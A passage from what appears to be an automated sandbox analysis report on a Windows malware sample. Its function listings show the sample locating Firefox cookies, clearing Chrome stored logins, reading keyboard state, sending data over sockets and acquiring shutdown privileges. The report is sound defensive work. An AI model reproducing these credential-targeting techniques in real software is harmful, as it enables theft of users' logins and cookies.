                                                                                                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                  • API String ID: 1164774033-405221262
                                                                                                                                  • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                  • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                  Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                                  • String ID: 8)3$PXG$PXG$P2$NG
                                                                                                                                  • API String ID: 341183262-3848105806
                                                                                                                                  • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                  • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                  Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1888522110-0
                                                                                                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                                  • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                  • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                  Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00449292
                                                                                                                                  • _free.LIBCMT ref: 004492B6
                                                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                  • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                  • API String ID: 1589313981-2876530381
                                                                                                                                  • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                  • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                  Strings
                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                  • UserProfile, xrefs: 0040BA59
                                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                                  • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                  • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                  Function 004541D9 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                  • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                  • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                                                                                  • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                  • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                                                                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1824512719-0
                                                                                                                                  • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                                                                                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                  • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                                                                                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 276877138-0
                                                                                                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID: SETTINGS
                                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
